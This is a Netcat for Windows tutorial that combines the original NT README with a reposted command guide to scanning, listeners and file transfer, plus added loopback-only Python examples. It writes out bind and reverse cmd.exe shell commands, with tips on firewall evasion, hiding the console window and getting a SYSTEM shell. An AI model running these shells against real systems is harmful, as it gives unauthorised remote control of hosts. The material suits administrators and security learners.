1. Download
https://eternallybored.org/misc/netcat/
2. Add the directory to the PATH environment variable
C:\Work\netcat
3. Quick test
4. Read the documentation
UPDATE 12/27/04 security fix in -e option for Windows Netcat 1.11 for NT - nc111nt.zip

The original version of Netcat was written by *hobbit* <hobbit@avian.org>
The NT version was done by Weld Pond <weld@vulnwatch.org>

Netcat for NT is the tcp/ip "Swiss Army knife" that never made it into any of the resource kits. It has proved to be an extremely versatile tool on the unix platform. So why should NT always be unix's poor cousin when it comes to tcp/ip testing and exploration? I bet many NT admins out there keep a unix box around to use tools such as Netcat or to test their systems with the unix version of an NT vulnerability exploit. With Netcat for NT part of that feeling of disempowerment is over.

Included with this release is Hobbit's original description of the powers of Netcat. In this document I will briefly describe some of the things an NT admin might want to do and know about with Netcat on NT. For more detailed technical information please read hobbit.txt included in the nc11nt.zip archive.

Basic Features

 * Outbound or inbound connections, TCP or UDP, to or from any ports
 * Full DNS forward/reverse checking, with appropriate warnings
 * Ability to use any local source port
 * Ability to use any locally-configured network source address
 * Built-in port-scanning capabilities, with randomizer
 * Can read command line arguments from standard input
 * Slow-send mode, one line every N seconds
 * Hex dump of transmitted and received data
 * Ability to let another program service established connections
 * Telnet-options responder

New for NT

 * Ability to run in the background without a console window
 * Ability to restart as a single-threaded server to handle a new connection

A simple example of using Netcat is to pull down a web page from a web server. With Netcat you get to see the full HTTP header so you can see which web server a particular site is running.

Since NT has a rather anemic command processor, some of the things that are easy in unix may be a bit more clunky in NT. For the web page example first create a file get.txt that contains the following line and then a blank line:

 GET / HTTP/1.0

To use Netcat to retrieve the home page of a web site use the command:

 nc -v www.website.com 80 < get.txt

You will see Netcat make a connection to port 80, send the text contained in the file get.txt, and then output the web server's response to stdout. The -v is for verbose. It tells you a little info about the connection when it starts.

It is a bit easier to just open the connection and then type at the console to do the same thing.

 nc -v www.website.com 80

Then just type in GET / HTTP/1.0 and hit a couple of returns. You will see the same thing as above.

A far more exciting thing to do is to get a quick shell going on a remote machine by using the -l or "listen" option and the -e or "execute" option. You run Netcat listening on a particular port for a connection. When a connection is made, Netcat executes the program of your choice and connects the stdin and stdout of the program to the network connection.

 nc -l -p 23 -t -e cmd.exe

will get Netcat listening on port 23 (telnet). When it gets connected to by a client it will spawn a shell (cmd.exe). The -t option tells Netcat to handle any telnet negotiation the client might expect. This will allow you to telnet to the machine you have Netcat listening on and get a cmd.exe shell when you connect. You could just as well use Netcat instead of telnet:

 nc xxx.xxx.xxx.xxx 23

will get the job done. There is no authentication on the listening side so be a bit careful here. The shell is running with the permissions of the process that started Netcat so be very careful. If you were to use the AT program to schedule Netcat to run listening on a port with the -e cmd.exe option, when you connected you would get a shell with user NT AUTHORITY\SYSTEM.

The beauty of Netcat really shines when you realize that you can get it listening on ANY port doing the same thing. Do a little exploring and see if the firewall you may be behind lets port 53 through. Run Netcat listening behind the firewall on port 53.

 nc -L -p 53 -e cmd.exe

Then from outside the firewall connect to the listening machine:

 nc -v xxx.xxx.xxx.xx 53

If you get a command prompt then you are executing commands on the listening machine. Use 'exit' at the command prompt for a clean disconnect. The -L (note the capital L) option will restart Netcat with the same command line when the connection is terminated. This way you can connect over and over to the same Netcat process.

A new feature for the NT version is the -d or detach from console flag. This will let Netcat run without an ugly console window cluttering up the screen or showing up in the task list.

You can even get Netcat to listen on the NETBIOS ports that are probably running on most NT machines. This way you can get a connection to a machine that may have port filtering enabled in the TCP/IP Security Network control panel. Unlike Unix, NT does not seem to have any security around which ports user programs are allowed to bind to. This means any user can run a program that will bind to the NETBIOS ports. You will need to bind "in front of" some services that may already be listening on those ports. An example is the NETBIOS Session Service that is running on port 139 of NT machines that are sharing files. You need to bind to a specific source address (one of the IP addresses of the machine) to accomplish this. This gives Netcat priority over the NETBIOS service which is at a lower priority because it is bound to ANY IP address. This is done with the Netcat -s option:

 nc -v -L -e cmd.exe -p 139 -s xxx.xxx.xxx.xxx

Now you can connect to the machine on port 139 and Netcat will field the connection before NETBIOS does. You have effectively shut off file sharing on this machine by the way. You have done this with just user privileges to boot.

PROBLEMS with Netcat 1.1 for NT

There are a few known problems that will eventually be fixed. One is the -w or timeout option. This works for final net reads but not for connections. Another problem is using the -e option in UDP mode. You may find that some of the features work on Windows 95. Most of the listening features will not work on Windows 95 however. These will be fixed in a later release.

Netcat is distributed with full source code so that people can build upon this work. If you add something useful or discover something interesting about NT TCP/IP let me know.

Weld Pond <weld@l0pht.com>, 2/2/98
Reposted from another blog
Source: https://blog.csdn.net/sdujava2011/article/details/46968183
1. Scan the ports of a given IP
2. Forward data between ports (key point)
3. Submit custom packets
1. Common scanning commands
Wherever "ip" appears below a hostname may be used instead; nc resolves it via DNS.
[Command] nc -v ip port
[Example] nc -v 96.44.174.9 80
[Explanation] Probe a single port on an IP and print the result of the connection attempt verbosely.
[Command] nc -v -z ip port-port
[Example] nc -v -z 96.44.174.9 80-1024
[Explanation] Scan a range of TCP ports on an IP with verbose output (-z: connect and close without sending data). Slow, because nc tries the ports one at a time.
[Command] nc -v -z -u ip port-port
[Example] nc -v -z -u 96.44.174.9 25-1024
[Explanation] Scan a range of UDP ports on an IP with verbose output. Also slow, and treat the result with caution: nc calls a UDP port open when no ICMP "port unreachable" comes back, so a filtered port looks exactly like an open one.
[Command] nc -nvv -w2 -z ip port-port
[Example] nc -nvv -w2 -z 96.44.174.9 80-1024
[Explanation] Scan a port range with a 2-second connection timeout (-w2). -n skips DNS lookups and -vv is very verbose.
Example run:
Summary: nc's scanning speed is nothing to write home about, and host discovery and port scanning are better left to a dedicated tool such as nmap; use each tool for what it does best. This section is only background.
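To show what `nc -v -z -w2 ip lo-hi` actually does, and why the post finds it slow, here is the same connect scan written out in Python. This is an added example, not code from the original post and not nc's source. It runs entirely against a loopback listener it opens itself, so the host, ports and timeout are all constructed for the demo.

```python
"""Connect scan with a per-port timeout, mirroring `nc -v -z -w2 host lo-hi`.
Added example; not part of the original post and not nc's own source."""
import socket


def parse_port_range(spec):
    """Accept the same 'lo-hi' or single-port syntax nc takes on the command line."""
    lo, sep, hi = spec.partition("-")
    lo = int(lo)
    hi = int(hi) if sep else lo
    if not 1 <= lo <= hi <= 65535:
        raise ValueError(f"bad port range: {spec!r}")
    return range(lo, hi + 1)


def tcp_port_open(host, port, timeout=2.0):
    """One TCP connect() bounded by `timeout`, then close: what `nc -z -w<timeout>` does.
    A completed handshake means open; a refusal or silence until the timeout means not open.
    Like nc, this cannot tell a closed port from a filtered one."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:  # ConnectionRefusedError and socket.timeout are both OSError
            return False
        return True


def connect_scan(host, ports, timeout=2.0):
    """Sequential scan, one port at a time, exactly like nc. Every port that does not answer
    costs the full timeout, so a fully filtered 80-1024 at -w2 takes about half an hour."""
    return [p for p in ports if tcp_port_open(host, p, timeout)]


def demo_scan(timeout=0.5):
    """Self-contained check: bind one ephemeral listener on 127.0.0.1 and scan the five ports
    around it. Returns (open_ports, listener_port); the listener port must appear in the list."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as lis:
        lis.bind(("127.0.0.1", 0))
        lis.listen(16)  # the scanner's connects complete from the backlog; no accept() needed
        port = lis.getsockname()[1]
        found = connect_scan("127.0.0.1", range(port - 2, port + 3), timeout)
    return found, port


if __name__ == "__main__":
    open_ports, target = demo_scan()
    print(f"listener on {target}; open ports found: {open_ports}")
```

The sequential loop in connect_scan is the whole explanation for the post's complaint: nmap parallelises and reads RST versus silence to separate closed from filtered, nc does neither.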
2. Common commands for listening, connecting and forwarding
[Command] nc -l -p 520
[Explanation] Open TCP port 520 on the local machine and listen for data sent to it.
[Command] nc -l -v -p 520
[Explanation] Open TCP port 520 locally and print whatever arrives to the current CMD window. This command is also the basis of the shell relays below.
[Command] nc -l -p 520 > C:/log.dat
[Explanation] Open TCP port 520 locally and write whatever arrives to the log file C:/log.dat.
[Command] nc -nvv 192.168.1.101 520
[Explanation] Connect to port 520 on host 192.168.1.101.
Key point 1 (forward connection):
[Run on the remote host] nc -l -p 2012 -t -e C:\WINDOWS\system32\cmd.exe
[Run locally] nc -nvv 192.168.1.101 2012
[Explanation] Forward connection: on the remote host (assume its IP is 192.168.1.101) run nc -l -p 2012 -t -e cmd.exe, which binds the remote host's CMD to port 2012; when the local host connects successfully it is handed a CMD shell. Locally, run nc -nvv 192.168.1.101 2012 to connect to the remote host (192.168.1.101) that has CMD redirected to port 2012. There is no authentication on this listener: anyone who can reach port 2012 gets the shell, with the privileges of the account that started nc.
Key point 2 (reverse connection):
[Run locally] nc -l -vv -p 2012
[Run on the remote host] nc -t -e C:\WINDOWS\system32\cmd.exe 192.168.1.102 2012
[Explanation] Reverse connection: first, on the local host (which has a public IP), run nc -l -vv -p 2012 to open port 2012 and wait for the remote host to connect; then on the remote host run nc -t -e cmd.exe 192.168.1.102 2012, which connects the remote host's CMD to port 2012 on the host at 192.168.1.102. Once the connection is up, the host at 192.168.1.102 has a CMD shell on the remote host.
Summary: this is the most common way to get a shell out of an internal network (the post files it under port forwarding; in current terms it is a reverse shell), and commands can be run through the shell once it calls back. The reverse connection is the usual way to bounce a shell to the local machine, because a connection initiated by the host itself is generally not blocked by its local firewall and similar devices, whereas a forward connection to a port on the remote host is frequently blocked.
Example run:
(In the screenshot, the upper CMD window is the host with the public IP and the lower one is the author's local machine; the directory listing shows the shell executing commands.)
3. Common commands for submitting data and transferring files
[Command] nc -vv www.91ri.org port < C:/http.txt
[Example] nc -vv www.91ri.org 80 < C:/http.txt (C:\http.txt also works in practice)
[Explanation] Submit the packet stored in http.txt to port 80 on www.91ri.org. -vv slows things down but lets you follow the exchange. The request in http.txt must end with a blank line, otherwise the web server keeps waiting for more headers. This is how a hand-crafted request is submitted for something like the IIS PUT vulnerability.
[Command 1] nc -v -n ip port < C:/sunzn.exe
[Command 2] nc -v -l -p port > D:/sunzn.exe
[Explanation] Run nc -v -n ip port < C:/sunzn.exe locally: it reads sunzn.exe from the root of the local C: drive and sends the bytes to the given port on the remote host (the IP on the command line is that of the host receiving the file). On the remote host run nc -v -l -p port > D:/sunzn.exe: it listens on that port and writes whatever it receives to D:/sunzn.exe. Together the two commands move the file from the local host to the remote one. Note that nc does not close the connection by itself once stdin is exhausted; either stop the sender with Ctrl-C once the transfer is done or add -w <seconds> so it exits after that many idle seconds (the pasted README says this "final net read" timeout is the part of -w that works on NT). nc offers no integrity check, so compare a hash of the file on both sides.
HTTP packet transfer example:
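The two uses in this section, pushing the hand-crafted request in http.txt and pushing sunzn.exe, are the same operation from nc's point of view: stream stdin to the socket, then read the socket back to stdout until the other side closes. The added example below implements both halves, `nc host port < file` and `nc -l -p port > file`, and adds the two things a practitioner wants that nc leaves out: a clean end-of-file signal (the half-close that makes the receiver stop without Ctrl-C or -w) and a SHA-256 comparison on both sides. It is not code from the original post or from nc. The payload, the loopback port and the Host header in the request are constructed for the demo; the post's http.txt contains only the request line and a blank line.

```python
"""`nc host port < file` and `nc -l -p port > file` in Python, with EOF and integrity handled.
Added example; not the original post's code and not nc's source."""
import hashlib
import os
import socket
import tempfile
import threading


def nc_send(host, port, payload, timeout=10.0):
    """`nc host port < file`: connect, stream the payload, half-close the write side so the
    peer sees EOF, then return whatever comes back (an HTTP response, or nothing from a
    plain file receiver). The half-close is what the old Windows nc does not do by itself;
    there you add -w <secs> so the sender quits once the file has gone out."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


def receive_to_file(listener, dest_path):
    """`nc -l -p port > file`: accept one connection and write everything up to EOF to
    dest_path. Returns the SHA-256 of what landed on disk; nc has no integrity check, so
    compare this with the sender's hash (certutil -hashfile on Windows) before trusting it."""
    conn, _ = listener.accept()
    digest = hashlib.sha256()
    with conn, open(dest_path, "wb") as f:
        while True:
            data = conn.recv(65536)
            if not data:
                break
            f.write(data)
            digest.update(data)
    return digest.hexdigest()


def http_get_request(host, path="/"):
    """The bytes you would put in http.txt / get.txt: a request line, a Host header
    (constructed here; the post's file has none), and the blank line that terminates the
    header block. Without that blank line the server sits waiting for more headers."""
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()


def demo_transfer():
    """Constructed 128 KiB payload over loopback.
    Returns (sha256 sent, sha256 received, bytes on disk, bytes the receiver sent back)."""
    payload = bytes(range(256)) * 512  # constructed binary data standing in for sunzn.exe
    sent_hash = hashlib.sha256(payload).hexdigest()
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "received.bin")
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as lis:
            lis.bind(("127.0.0.1", 0))
            lis.listen(1)
            port = lis.getsockname()[1]
            result = {}
            t = threading.Thread(target=lambda: result.update(h=receive_to_file(lis, dest)))
            t.start()
            echoed = nc_send("127.0.0.1", port, payload)
            t.join()
        size = os.path.getsize(dest)
    return sent_hash, result["h"], size, echoed


if __name__ == "__main__":
    sent, got, size, _ = demo_transfer()
    print(f"{size} bytes, hashes match: {sent == got}")
    print(http_get_request("www.91ri.org").decode(), end="")
```

For the HTTP case, nc_send("www.91ri.org", 80, http_get_request("www.91ri.org")) returns the raw response including the status line and Server header, which is exactly what the README's get.txt trick shows on the console. Everything here crosses the wire in the clear; nc gives no confidentiality either, so it belongs inside a tunnel you already trust.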